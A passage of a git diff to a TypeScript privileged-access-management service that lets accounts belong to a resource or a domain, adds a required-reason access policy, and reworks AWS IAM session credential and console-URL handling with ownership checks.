export const pamAccountServiceFactory = ({ const { account, insertedMetadata } = await pamAccountDAL.transaction(async (tx) => { const newAccount = await pamAccountDAL.create( { - projectId: resource.projectId, - resourceId: resource.id, + projectId: parent.projectId, + resourceId: resourceId || null, + domainId: domainId || null, encryptedCredentials, name, description, @@ -245,20 +323,18 @@ export const pamAccountServiceFactory = ({ }); return { - ...(await decryptAccount(account, resource.projectId, kmsService)), + ...(await decryptAccount(account, parent.projectId, kmsService)), + ...formatAccountParent({ + resource: parent.isResource ? parent.raw : null, + domain: parent.isResource ? null : parent.raw + }), metadata: insertedMetadata?.map(({ id, key, value }) => ({ id, key, value: value ?? "" })) ?? [], - resourceType: resource.resourceType, - resource: { - id: resource.id, - name: resource.name, - resourceType: resource.resourceType, - rotationCredentialsConfigured: !!resource.encryptedRotationAccountCredentials - } + requireReason: await resolveRequireReason(account.policyId) }; } catch (err) { if (err instanceof DatabaseError && (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation) { throw new BadRequestError({ - message: `Account with name '${name}' already exists for this resource` + message: `Account with name '${name}' already exists` }); } @@ -273,8 +349,8 @@ export const pamAccountServiceFactory = ({ const account = await pamAccountDAL.findById(accountId); if (!account) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); - const resource = await pamResourceDAL.findById(account.resourceId); - if (!resource) throw new NotFoundError({ message: `Resource with ID '${account.resourceId}' not found` }); + const parent = await resolveAccountParent(account); + const resource = parent.isResource ? 
(parent.raw as TPamResources) : null; const { permission } = await permissionService.getProjectPermission({ actor: actor.type, @@ -292,9 +368,9 @@ export const pamAccountServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.Edit, subject(ProjectPermissionSub.PamAccounts, { - resourceName: resource.name, accountName: account.name, - resourceType: resource.resourceType, + ...(parent.isResource && { resourceName: parent.name, resourceType: parent.resourceType }), + ...(!parent.isResource && { domainName: parent.name, domainType: parent.domainType }), metadata: currentMetadata }) ); @@ -304,9 +380,9 @@ export const pamAccountServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.Edit, subject(ProjectPermissionSub.PamAccounts, { - resourceName: resource.name, accountName: name ?? account.name, - resourceType: resource.resourceType, + ...(parent.isResource && { resourceName: parent.name, resourceType: parent.resourceType }), + ...(!parent.isResource && { domainName: parent.name, domainType: parent.domainType }), metadata: metadata ? metadata.map(({ key, value }) => ({ key, value: value ?? "" })) : currentMetadata }) ); @@ -341,29 +417,42 @@ export const pamAccountServiceFactory = ({ } if (credentials !== undefined) { - const connectionDetails = await decryptResourceConnectionDetails({ - projectId: account.projectId, - encryptedConnectionDetails: resource.encryptedConnectionDetails, - kmsService - }); - - // Decrypt resource metadata if available - const resourceInternalMetadata = resource.encryptedResourceMetadata - ? 
await decryptResourceMetadata({ - encryptedMetadata: resource.encryptedResourceMetadata, - projectId: account.projectId, - kmsService - }) - : undefined; - - const factory = PAM_RESOURCE_FACTORY_MAP[resource.resourceType as PamResource]( - resource.resourceType as PamResource, - connectionDetails, - resource.gatewayId, - gatewayV2Service, - account.projectId, - resourceInternalMetadata - ); + let factory; + if (parent.isResource) { + const connectionDetails = await decryptResourceConnectionDetails({ + projectId: account.projectId, + encryptedConnectionDetails: parent.encryptedConnectionDetails, + kmsService + }); + const resourceInternalMetadata = parent.encryptedResourceMetadata + ? await decryptResourceMetadata({ + encryptedMetadata: parent.encryptedResourceMetadata, + projectId: account.projectId, + kmsService + }) + : undefined; + factory = PAM_RESOURCE_FACTORY_MAP[parent.resourceType as PamResource]( + parent.resourceType as PamResource, + connectionDetails, + parent.gatewayId, + gatewayV2Service, + account.projectId, + resourceInternalMetadata + ); + } else { + const connectionDetails = await decryptDomainConnectionDetails({ + projectId: account.projectId, + encryptedConnectionDetails: parent.encryptedConnectionDetails, + kmsService + }); + factory = PAM_DOMAIN_FACTORY_MAP[parent.domainType as PamDomainType]( + parent.domainType as PamDomainType, + connectionDetails, + parent.gatewayId, + gatewayV2Service, + account.projectId + ); + } const decryptedCredentials = await decryptAccountCredentials({ encryptedCredentials: account.encryptedCredentials, @@ -391,14 +480,12 @@ export const pamAccountServiceFactory = ({ const existingMeta = await pamAccountDAL.findMetadataByAccountIds([accountId]); return { ...(await decryptAccount(account, account.projectId, kmsService)), + ...formatAccountParent({ + resource, + domain: parent.isResource ? 
null : parent.raw + }), metadata: existingMeta[accountId] || [], - resourceType: resource.resourceType, - resource: { - id: resource.id, - name: resource.name, - resourceType: resource.resourceType, - rotationCredentialsConfigured: !!resource.encryptedRotationAccountCredentials - } + requireReason: await resolveRequireReason(account.policyId) }; } @@ -428,14 +515,12 @@ export const pamAccountServiceFactory = ({ return { ...(await decryptAccount(updatedAccount, account.projectId, kmsService)), + ...formatAccountParent({ + resource, + domain: parent.isResource ? null : parent.raw + }), metadata: freshMeta[accountId] || [], - resourceType: resource.resourceType, - resource: { - id: resource.id, - name: resource.name, - resourceType: resource.resourceType, - rotationCredentialsConfigured: !!resource.encryptedRotationAccountCredentials - } + requireReason: await resolveRequireReason(updatedAccount.policyId) }; } catch (err) { if (err instanceof DatabaseError && (err.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation) { @@ -452,8 +537,7 @@ export const pamAccountServiceFactory = ({ const account = await pamAccountDAL.findById(id); if (!account) throw new NotFoundError({ message: `Account with ID '${id}' not found` }); - const resource = await pamResourceDAL.findById(account.resourceId); - if (!resource) throw new NotFoundError({ message: `Resource with ID '${account.resourceId}' not found` }); + const parent = await resolveAccountParent(account); const { permission } = await permissionService.getProjectPermission({ actor: actor.type, @@ -469,9 +553,9 @@ export const pamAccountServiceFactory = ({ ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.Delete, subject(ProjectPermissionSub.PamAccounts, { - resourceName: resource.name, accountName: account.name, - resourceType: resource.resourceType, + ...(parent.isResource && { resourceName: parent.name, resourceType: parent.resourceType }), + ...(!parent.isResource && { 
domainName: parent.name, domainType: parent.domainType }), metadata: accountMeta[id] || [] }) ); @@ -480,13 +564,10 @@ export const pamAccountServiceFactory = ({ return { ...(await decryptAccount(deletedAccount, account.projectId, kmsService)), - resourceType: resource.resourceType, - resource: { - id: resource.id, - name: resource.name, - resourceType: resource.resourceType, - rotationCredentialsConfigured: !!resource.encryptedRotationAccountCredentials - } + ...formatAccountParent({ + resource: parent.isResource ? parent.raw : null, + domain: parent.isResource ? null : parent.raw + }) }; }; @@ -511,58 +592,63 @@ export const pamAccountServiceFactory = ({ const limit = params.limit || 20; const offset = params.offset || 0; - const { accounts: accountsWithResourceDetails, totalCount } = - await pamAccountDAL.findByProjectIdWithResourceDetails({ - projectId, - accountView, - offset, - limit, - search: params.search, - orderBy: params.orderBy, - orderDirection: params.orderDirection, - filterResourceIds: params.filterResourceIds, - metadataFilter: params.metadataFilter - }); + const { accounts: accountsWithParentDetails, totalCount } = await pamAccountDAL.findByProjectIdWithParentDetails({ + projectId, + accountView, + offset, + limit, + search: params.search, + orderBy: params.orderBy, + orderDirection: params.orderDirection, + filterResourceIds: params.filterResourceIds, + filterDomainIds: params.filterDomainIds, + metadataFilter: params.metadataFilter + }); const decryptedAndPermittedAccounts: Array< Omit & { - resource: Pick & { rotationCredentialsConfigured: boolean }; + resource: + | (Pick & { rotationCredentialsConfigured: boolean }) + | null; + domain: { id: string; name: string; domainType: string } | null; credentials: TPamAccountCredentials; lastRotationMessage: string | null; - resourceType: string; } > = []; // Fetch metadata for all accounts before permission loop - const allAccountIds = accountsWithResourceDetails.map((a) => a.id); + const 
allAccountIds = accountsWithParentDetails.map((a) => a.id); const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds(allAccountIds); - for await (const account of accountsWithResourceDetails) { - // Check permission for each individual account + for await (const account of accountsWithParentDetails) { if ( permission.can( ProjectPermissionPamAccountActions.Read, subject(ProjectPermissionSub.PamAccounts, { - resourceName: account.resource.name, accountName: account.name, - resourceType: account.resource.resourceType, + ...(account.resource && { + resourceName: account.resource.name, + resourceType: account.resource.resourceType + }), + ...(account.domain && { domainName: account.domain.name, domainType: account.domain.domainType }), metadata: metadataByAccountId[account.id] || [] }) ) ) { // Decrypt the account only if the user has permission to read it - const decryptedAccount = await decryptAccount(account, account.projectId, kmsService); + const decryptedAccount = await decryptAccount( + account as Parameters[0], + account.projectId, + kmsService + ); decryptedAndPermittedAccounts.push({ ...decryptedAccount, - resourceType: account.resource.resourceType, - resource: { - id: account.resource.id, - name: account.resource.name, - resourceType: account.resource.resourceType, - rotationCredentialsConfigured: !!account.resource.encryptedRotationAccountCredentials - } - }); + ...formatAccountParent({ + resource: account.resource, + domain: account.domain + }) + } as unknown as (typeof decryptedAndPermittedAccounts)[0]); } } @@ -582,43 +668,47 @@ export const pamAccountServiceFactory = ({ }; const getById = async ({ accountId, actor, actorId, actorAuthMethod, actorOrgId }: TGetAccountByIdDTO) => { - const accountWithResource = await pamAccountDAL.findByIdWithResourceDetails(accountId); - if (!accountWithResource) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + const accountWithParent = await 
pamAccountDAL.findByIdWithParentDetails(accountId); + if (!accountWithParent) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); const { permission } = await permissionService.getProjectPermission({ actor, actorId, - projectId: accountWithResource.projectId, + projectId: accountWithParent.projectId, actorAuthMethod, actorOrgId, actionProjectType: ActionProjectType.PAM }); - const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithResource.id]); - const accountMetadata = metadataByAccountId[accountWithResource.id] || []; + const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithParent.id]); + const accountMetadata = metadataByAccountId[accountWithParent.id] || []; ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.Read, subject(ProjectPermissionSub.PamAccounts, { - resourceName: accountWithResource.resource.name, - accountName: accountWithResource.name, - resourceType: accountWithResource.resource.resourceType, + accountName: accountWithParent.name, + ...(accountWithParent.resource && { + resourceName: accountWithParent.resource.name, + resourceType: accountWithParent.resource.resourceType + }), + ...(accountWithParent.domain && { + domainName: accountWithParent.domain.name, + domainType: accountWithParent.domain.domainType + }), metadata: accountMetadata }) ); - const decryptedAccount = await decryptAccount(accountWithResource, accountWithResource.projectId, kmsService); + const decryptedAccount = await decryptAccount(accountWithParent, accountWithParent.projectId, kmsService); return { ...decryptedAccount, + ...formatAccountParent({ + resource: accountWithParent.resource, + domain: accountWithParent.domain + }), metadata: accountMetadata, - resourceType: accountWithResource.resource.resourceType, - resource: { - id: accountWithResource.resource.id, - name: accountWithResource.resource.name, - resourceType: 
accountWithResource.resource.resourceType, - rotationCredentialsConfigured: !!accountWithResource.resource.encryptedRotationAccountCredentials - } + requireReason: await resolveRequireReason(accountWithParent.policyId) }; }; @@ -632,7 +722,8 @@ export const pamAccountServiceFactory = ({ actorName, actorUserAgent, duration, - mfaSessionId + mfaSessionId, + reason }: TAccessAccountDTO, actor: OrgServiceActor ) => { @@ -655,6 +746,8 @@ export const pamAccountServiceFactory = ({ }); } + const trimmedReason = reason?.trim() || null; + const fac = APPROVAL_POLICY_FACTORY_MAP[ApprovalPolicyType.PamAccess](ApprovalPolicyType.PamAccess); const inputs = { @@ -703,16 +796,31 @@ export const pamAccountServiceFactory = ({ ); } - const project = await projectDAL.findById(account.projectId); - if (!project) throw new NotFoundError({ message: `Project with ID '${account.projectId}' not found` }); + // Reason check is intentionally placed after the approval/permission gates so + // its distinct error code does not leak policy configuration to unauthorized actors. + if (account.policyId) { + const policy = await pamAccountPolicyDAL.findById(account.policyId); + const policyRules = (policy?.rules ?? 
{}) as TPolicyRules; + if (policy?.isActive && policyRules[PamAccountPolicyRuleType.RequireReason] && !trimmedReason) { + throw new BadRequestError({ + message: "A reason is required to access this account", + name: "PAM_REASON_REQUIRED" + }); + } + } const actorUser = await userDAL.findById(actor.id); if (!actorUser) throw new NotFoundError({ message: `User with ID '${actor.id}' not found` }); // If no mfaSessionId is provided, create a new MFA session if (!mfaSessionId && account.requireMfa) { - // Get organization to check if MFA is enforced at org level - const org = await orgDAL.findOrgById(project.orgId); + const project = await requestMemoize(requestMemoKeys.projectFindById(account.projectId), () => + projectDAL.findById(account.projectId) + ); + if (!project) throw new NotFoundError({ message: `Project with ID '${account.projectId}' not found` }); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(project.orgId), () => + orgDAL.findOrgById(project.orgId) + ); if (!org) throw new NotFoundError({ message: `Organization with ID '${project.orgId}' not found` }); // Determine which MFA method to use @@ -779,10 +887,6 @@ export const pamAccountServiceFactory = ({ kmsService ); - // Disable access to Active Directory - if (resourceType === PamResource.ActiveDirectory) - throw new BadRequestError({ message: `Active Directory resources cannot be accessed` }); - // Temporarily disable access to Windows Server if (resourceType === PamResource.Windows) throw new BadRequestError({ message: `Windows resources cannot be accessed at this time` }); @@ -797,7 +901,7 @@ export const pamAccountServiceFactory = ({ projectId: account.projectId })) as TAwsIamAccountCredentials; - const { consoleUrl, expiresAt } = await generateConsoleFederationUrl({ + const credentials = await generateAwsIamSessionCredentials({ connectionDetails, targetRoleArn: awsCredentials.targetRoleArn, roleSessionName: actorEmail, @@ -818,23 +922,35 @@ export const pamAccountServiceFactory = 
({ accountId: account.id, resourceId: resource.id, userId: actor.id, - expiresAt, - startedAt: new Date() + expiresAt: credentials.expiresAt, + startedAt: new Date(), + reason: trimmedReason }); + // Cache the AccessKeyId so /aws-console-url can verify the caller is + // submitting credentials that actually belong to this session + const ttlSeconds = Math.max(1, Math.floor((credentials.expiresAt.getTime() - Date.now()) / 1000)); + await keyStore.setItemWithExpiry( + KeyStorePrefixes.PamAwsIamAccessKeyId(session.id), + ttlSeconds, + credentials.accessKeyId + ); + // Schedule session expiration job to run at expiresAt - await pamSessionExpirationService.scheduleSessionExpiration(session.id, expiresAt); + await pamSessionExpirationService.scheduleSessionExpiration(session.id, credentials.expiresAt); return { sessionId: session.id, resourceType, account, - consoleUrl, + accessKeyId: credentials.accessKeyId, + secretAccessKey: credentials.secretAccessKey, + sessionToken: credentials.sessionToken, + expiresAt: credentials.expiresAt.toISOString(), metadata: { awsAccountId: extractAwsAccountIdFromArn(connectionDetails.roleArn), targetRoleArn: awsCredentials.targetRoleArn, - federatedUsername: actorEmail, - expiresAt: expiresAt.toISOString() + federatedUsername: actorEmail } }; } @@ -853,7 +969,8 @@ export const pamAccountServiceFactory = ({ accountId: account.id, resourceId: resource.id, userId: actor.id, - expiresAt: new Date(Date.now() + duration) + expiresAt: new Date(Date.now() + duration), + reason: trimmedReason }); if (!gatewayId) { @@ -980,31 +1097,102 @@ export const pamAccountServiceFactory = ({ }; }; + const getAwsIamConsoleUrl = async ( + { + sessionId, + projectId, + accessKeyId, + secretAccessKey, + sessionToken + }: { + sessionId: string; + projectId: string; + accessKeyId: string; + secretAccessKey: string; + sessionToken: string; + }, + actor: OrgServiceActor + ) => { + const session = await pamSessionDAL.findById(sessionId); + if (!session) throw new 
NotFoundError({ message: `Session with ID '${sessionId}' not found` }); + + if (session.projectId !== projectId) { + throw new ForbiddenRequestError({ message: "Session does not belong to the specified project" }); + } + + if (session.userId !== actor.id) { + throw new ForbiddenRequestError({ message: "Session does not belong to the current user" }); + } + + if (session.resourceType !== PamResource.AwsIam) { + throw new BadRequestError({ message: "Session is not an AWS IAM session" }); + } + + if (session.endedAt || (session.expiresAt && session.expiresAt < new Date())) { + throw new BadRequestError({ message: "Session has ended or expired" }); + } + + // Confirm the submitted creds actually belong to this session by comparing + // against the AccessKeyId we stashed at /access time + const expectedAccessKeyId = await keyStore.getItem(KeyStorePrefixes.PamAwsIamAccessKeyId(sessionId)); + if (!expectedAccessKeyId) { + throw new BadRequestError({ + message: "Session credentials are no longer available. Please re-access the account." 
+ }); + } + if (expectedAccessKeyId !== accessKeyId) { + throw new ForbiddenRequestError({ + message: "Submitted credentials do not match the session" + }); + } + + const consoleUrl = await exchangeCredentialsForConsoleUrl({ + accessKeyId, + secretAccessKey, + sessionToken + }); + + return { + consoleUrl, + accountId: session.accountId, + accountName: session.accountName, + resourceName: session.resourceName + }; + }; + const getSessionCredentials = async (sessionId: string, actor: OrgServiceActor) => { - // To be hit by gateways only - if (actor.type !== ActorType.IDENTITY) { + // To be hit by gateways only (identity-based or enrollment-flow) + if (actor.type !== ActorType.IDENTITY && actor.type !== ActorType.GATEWAY) { throw new ForbiddenRequestError({ message: "Only gateways can perform this action" }); } const session = await pamSessionDAL.findById(sessionId); if (!session) throw new NotFoundError({ message: `Session with ID '${sessionId}' not found` }); - const project = await projectDAL.findById(session.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(session.projectId), () => + projectDAL.findById(session.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${session.projectId}' not found` }); - const { permission } = await permissionService.getOrgPermission({ - actor: actor.type, - actorId: actor.id, - orgId: project.orgId, - actorAuthMethod: actor.authMethod, - actorOrgId: actor.orgId, - scope: OrganizationActionScope.Any - }); + if (actor.type === ActorType.IDENTITY) { + const { permission } = await permissionService.getOrgPermission({ + actor: actor.type, + actorId: actor.id, + orgId: project.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + scope: OrganizationActionScope.Any + }); - ForbiddenError.from(permission).throwUnlessCan( - OrgPermissionGatewayActions.CreateGateways, - OrgPermissionSubjects.Gateway - ); + ForbiddenError.from(permission).throwUnlessCan( + 
OrgPermissionGatewayActions.CreateGateways, + OrgPermissionSubjects.Gateway + ); + } else if (actor.type === ActorType.GATEWAY) { + if (project.orgId !== actor.orgId) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to this session" }); + } + } if (!session.accountId) throw new NotFoundError({ message: "Session is missing accountId column" }); @@ -1016,13 +1204,17 @@ export const pamAccountServiceFactory = ({ const account = await pamAccountDAL.findById(session.accountId); if (!account) throw new NotFoundError({ message: `Account with ID '${session.accountId}' not found` }); - const resource = await pamResourceDAL.findById(account.resourceId); + const resource = await pamResourceDAL.findById(account.resourceId!); if (!resource) throw new NotFoundError({ message: `Resource with ID '${account.resourceId}' not found` }); - if (resource.gatewayId && resource.gatewayIdentityId !== actor.id) { - throw new ForbiddenRequestError({ - message: "Identity does not have access to fetch the PAM session credentials" - }); + if (resource.gatewayId) { + const authorized = + actor.type === ActorType.GATEWAY ? resource.gatewayId === actor.id : resource.gatewayIdentityId === actor.id; + if (!authorized) { + throw new ForbiddenRequestError({ + message: "Gateway does not have access to fetch the PAM session credentials" + }); + } } const decryptedAccount = await decryptAccount(account, session.projectId, kmsService); @@ -1035,13 +1227,17 @@ export const pamAccountServiceFactory = ({ const policy = await pamAccountPolicyDAL.findById(account.policyId); if (policy && policy.isActive) { const rules = (policy.rules ?? 
{}) as TPolicyRules; - for (const ruleType of Object.values(PamAccountPolicyRuleType)) { + + const gatewayRuleTypes = [ + PamAccountPolicyRuleType.CommandBlocking, + PamAccountPolicyRuleType.SessionLogMasking + ] as const; + for (const ruleType of gatewayRuleTypes) { const ruleConfig = rules[ruleType]; - if (ruleConfig) { - const supported = PAM_ACCOUNT_POLICY_RULE_SUPPORTED_RESOURCES[ruleType]; - if (supported === "all" || supported.includes(resource.resourceType as PamResource)) { - policyRules[ruleType] = ruleConfig; - } + const supported = PAM_ACCOUNT_POLICY_RULE_SUPPORTED_RESOURCES[ruleType]; + const isSupported = supported === "all" || supported.includes(resource.resourceType as PamResource); + if (ruleConfig && isSupported) { + policyRules[ruleType] = ruleConfig; } } } @@ -1149,13 +1345,16 @@ export const pamAccountServiceFactory = ({ if (minIntervalSeconds === Infinity) return []; const resourceIdsWithRules = Object.keys(rulesByResource); - const accounts = await pamAccountDAL.findRotationCandidates(resourceIdsWithRules, minIntervalSeconds); + const accounts = await pamAccountDAL.findRotationCandidates({ + resourceIds: resourceIdsWithRules, + minIntervalSeconds + }); const now = Date.now(); const dueAccounts: TPamAccounts[] = []; for (const account of accounts) { - const rules = rulesByResource[account.resourceId]; + const rules = rulesByResource[account.resourceId!]; // eslint-disable-next-line no-continue if (!rules) continue; @@ -1198,7 +1397,7 @@ export const pamAccountServiceFactory = ({ if (!claimed) return; // Read resource - const resource = await pamResourceDAL.findById(account.resourceId); + const resource = await pamResourceDAL.findById(account.resourceId!); if (!resource || !resource.encryptedRotationAccountCredentials) { logger.warn( `[Rotation] Resource or rotation credentials missing for account [accountId=${account.id}], releasing lock` @@ -1366,7 +1565,7 @@ export const pamAccountServiceFactory = ({ metadata: { accountId: account.id, 
accountName: account.name, - resourceId: account.resourceId, + resourceId: account.resourceId!, resourceType: logResourceType, errorMessage } @@ -1389,60 +1588,61 @@ export const pamAccountServiceFactory = ({ }; const triggerManualRotation = async (accountId: string, actor: OrgServiceActor) => { - const accountWithResource = await pamAccountDAL.findByIdWithResourceDetails(accountId); - if (!accountWithResource) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + const accountWithParent = await pamAccountDAL.findByIdWithParentDetails(accountId); + if (!accountWithParent) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + if (!accountWithParent.resource) + throw new NotFoundError({ message: `Resource not found for account '${accountId}'` }); const { permission } = await permissionService.getProjectPermission({ actor: actor.type, actorAuthMethod: actor.authMethod, actorId: actor.id, actorOrgId: actor.orgId, - projectId: accountWithResource.projectId, + projectId: accountWithParent.projectId, actionProjectType: ActionProjectType.PAM }); ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.TriggerRotation, subject(ProjectPermissionSub.PamAccounts, { - resourceName: accountWithResource.resource.name, - accountName: accountWithResource.name, - resourceType: accountWithResource.resource.resourceType + resourceName: accountWithParent.resource.name, + accountName: accountWithParent.name, + resourceType: accountWithParent.resource.resourceType }) ); - if (!accountWithResource.resource.encryptedRotationAccountCredentials) { + if (!accountWithParent.resource.encryptedRotationAccountCredentials) { throw new BadRequestError({ message: "Rotation credentials are not configured on this resource" }); } // Immediate check. 
There's an actual atomic lock in rotateAccount - if (accountWithResource.rotationStatus === PamAccountRotationStatus.Rotating) { + if (accountWithParent.rotationStatus === PamAccountRotationStatus.Rotating) { throw new BadRequestError({ message: "Account is already being rotated" }); } - await rotateAccount(accountWithResource); + await rotateAccount(accountWithParent); - const updatedAccountWithResource = await pamAccountDAL.findByIdWithResourceDetails(accountId); - if (!updatedAccountWithResource) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + const updatedAccountWithParent = await pamAccountDAL.findByIdWithParentDetails(accountId); + if (!updatedAccountWithParent) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + if (!updatedAccountWithParent.resource) + throw new NotFoundError({ message: `Resource not found for account '${accountId}'` }); - const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([updatedAccountWithResource.id]); - const accountMetadata = metadataByAccountId[updatedAccountWithResource.id] || []; + const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([updatedAccountWithParent.id]); + const accountMetadata = metadataByAccountId[updatedAccountWithParent.id] || []; const decryptedAccount = await decryptAccount( - updatedAccountWithResource, - updatedAccountWithResource.projectId, + updatedAccountWithParent, + updatedAccountWithParent.projectId, kmsService ); return { ...decryptedAccount, metadata: accountMetadata, - resourceType: updatedAccountWithResource.resource.resourceType, - resource: { - id: updatedAccountWithResource.resource.id, - name: updatedAccountWithResource.resource.name, - resourceType: updatedAccountWithResource.resource.resourceType, - rotationCredentialsConfigured: !!updatedAccountWithResource.resource.encryptedRotationAccountCredentials - } + ...formatAccountParent({ + resource: updatedAccountWithParent.resource, + domain: 
null + }) }; }; @@ -1454,58 +1654,67 @@ export const pamAccountServiceFactory = ({ actorAuthMethod, actorOrgId }: TViewAccountCredentialsDTO) => { - const accountWithResource = await pamAccountDAL.findByIdWithResourceDetails(accountId); - if (!accountWithResource) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + const accountWithParent = await pamAccountDAL.findByIdWithParentDetails(accountId); + if (!accountWithParent) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + if (!accountWithParent.resource && !accountWithParent.domain) + throw new NotFoundError({ message: `Parent not found for account '${accountId}'` }); const { permission } = await permissionService.getProjectPermission({ actor, actorId, - projectId: accountWithResource.projectId, + projectId: accountWithParent.projectId, actorAuthMethod, actorOrgId, actionProjectType: ActionProjectType.PAM }); - const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithResource.id]); - const accountMetadata = metadataByAccountId[accountWithResource.id] || []; + const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithParent.id]); + const accountMetadata = metadataByAccountId[accountWithParent.id] || []; ForbiddenError.from(permission).throwUnlessCan( ProjectPermissionPamAccountActions.ReadCredentials, subject(ProjectPermissionSub.PamAccounts, { - resourceName: accountWithResource.resource.name, - resourceType: accountWithResource.resource.resourceType, - accountName: accountWithResource.name, + accountName: accountWithParent.name, + ...(accountWithParent.resource && { + resourceName: accountWithParent.resource.name, + resourceType: accountWithParent.resource.resourceType + }), + ...(accountWithParent.domain && { + domainName: accountWithParent.domain.name, + domainType: accountWithParent.domain.domainType + }), metadata: accountMetadata }) ); - // Decrypt early so we can check if there are 
sensitive fields before triggering MFA + const parentType = accountWithParent.resource?.resourceType || accountWithParent.domain?.domainType || ""; + const credentials = await decryptAccountCredentials({ - encryptedCredentials: accountWithResource.encryptedCredentials, + encryptedCredentials: accountWithParent.encryptedCredentials, kmsService, - projectId: accountWithResource.projectId + projectId: accountWithParent.projectId }); - if (!hasSensitiveCredentials(accountWithResource.resource.resourceType, credentials)) { + if (!hasSensitiveCredentials(parentType, credentials)) { throw new BadRequestError({ message: "This account has no sensitive credentials to view" }); } - if (!mfaSessionId && accountWithResource.requireMfa) { - const project = await projectDAL.findById(accountWithResource.projectId); - if (!project) - throw new NotFoundError({ message: `Project with ID '${accountWithResource.projectId}' not found` }); - + if (!mfaSessionId && accountWithParent.requireMfa) { + // actorOrgId equals project.orgId: getProjectPermission above guarantees project existence + // and org membership, so no separate project lookup is needed to resolve the org ID. const actorUser = await userDAL.findById(actorId); if (!actorUser) throw new NotFoundError({ message: `User with ID '${actorId}' not found` }); - const org = await orgDAL.findOrgById(project.orgId); - if (!org) throw new NotFoundError({ message: `Organization with ID '${project.orgId}' not found` }); + const org = await requestMemoize(requestMemoKeys.orgFindOrgById(actorOrgId), () => + orgDAL.findOrgById(actorOrgId) + ); + if (!org) throw new NotFoundError({ message: `Organization with ID '${actorOrgId}' not found` }); const orgMfaMethod = org.enforceMfa ? (org.selectedMfaMethod as MfaMethod | null) : undefined; const userMfaMethod = actorUser.isMfaEnabled ? (actorUser.selectedMfaMethod as MfaMethod | null) : undefined; const mfaMethod = (orgMfaMethod ?? userMfaMethod ?? 
MfaMethod.EMAIL) as MfaMethod; - const newMfaSessionId = await mfaSessionService.createMfaSession(actorUser.id, accountWithResource.id, mfaMethod); + const newMfaSessionId = await mfaSessionService.createMfaSession(actorUser.id, accountWithParent.id, mfaMethod); if (mfaMethod === MfaMethod.EMAIL && actorUser.email) { await mfaSessionService.sendMfaCode(actorUser.id, actorUser.email); @@ -1521,7 +1730,7 @@ export const pamAccountServiceFactory = ({ }); } - if (mfaSessionId && accountWithResource.requireMfa) { + if (mfaSessionId && accountWithParent.requireMfa) { const mfaSession = await mfaSessionService.getMfaSession(mfaSessionId); if (!mfaSession) { throw new BadRequestError({ message: "MFA session not found or expired" }); @@ -1531,7 +1740,7 @@ export const pamAccountServiceFactory = ({ throw new BadRequestError({ message: "MFA session does not belong to current user" }); } - if (mfaSession.resourceId !== accountWithResource.id) { + if (mfaSession.resourceId !== accountWithParent.id) { throw new BadRequestError({ message: "MFA session is for a different account" }); } @@ -1544,12 +1753,24 @@ export const pamAccountServiceFactory = ({ return { credentials, - resourceType: accountWithResource.resource.resourceType, - accountId: accountWithResource.id, - accountName: accountWithResource.name, - resourceId: accountWithResource.resource.id, - resourceName: accountWithResource.resource.name, - projectId: accountWithResource.projectId + parentType, + accountId: accountWithParent.id, + accountName: accountWithParent.name, + projectId: accountWithParent.projectId, + resource: accountWithParent.resource + ? { + id: accountWithParent.resource.id, + name: accountWithParent.resource.name, + resourceType: accountWithParent.resource.resourceType + } + : null, + domain: accountWithParent.domain + ? 
{ + id: accountWithParent.domain.id, + name: accountWithParent.domain.name, + domainType: accountWithParent.domain.domainType + } + : null }; }; @@ -1560,6 +1781,7 @@ export const pamAccountServiceFactory = ({ list, getById, access, + getAwsIamConsoleUrl, viewCredentials, getSessionCredentials, rotateAllDueAccounts, diff --git a/backend/src/ee/services/pam-account/pam-account-types.ts b/backend/src/ee/services/pam-account/pam-account-types.ts index 7ef92736146..b61e83f9081 100644 --- a/backend/src/ee/services/pam-account/pam-account-types.ts +++ b/backend/src/ee/services/pam-account/pam-account-types.ts @@ -9,8 +9,10 @@ import { PamAccountOrderBy, PamAccountView } from "./pam-account-enums"; // DTOs export type TCreateAccountDTO = Pick< TPamAccount, - "name" | "description" | "credentials" | "folderId" | "resourceId" | "requireMfa" + "name" | "description" | "credentials" | "folderId" | "requireMfa" > & { + resourceId?: string; + domainId?: string; internalMetadata?: Record; metadata?: z.input; policyId?: string | null; @@ -30,6 +32,7 @@ export type TAccessAccountDTO = { actorUserAgent: string; duration: number; mfaSessionId?: string; + reason?: string; }; export type TListAccountsDTO = { @@ -40,6 +43,7 @@ export type TListAccountsDTO = { limit?: number; offset?: number; filterResourceIds?: string[]; + filterDomainIds?: string[]; metadataFilter?: Array<{ key: string; value?: string }>; } & TProjectPermission; diff --git a/backend/src/ee/services/pam-discovery/active-directory/active-directory-discovery-factory.ts b/backend/src/ee/services/pam-discovery/active-directory/active-directory-discovery-factory.ts index d25b83719bc..cfe5231eedc 100644 --- a/backend/src/ee/services/pam-discovery/active-directory/active-directory-discovery-factory.ts +++ 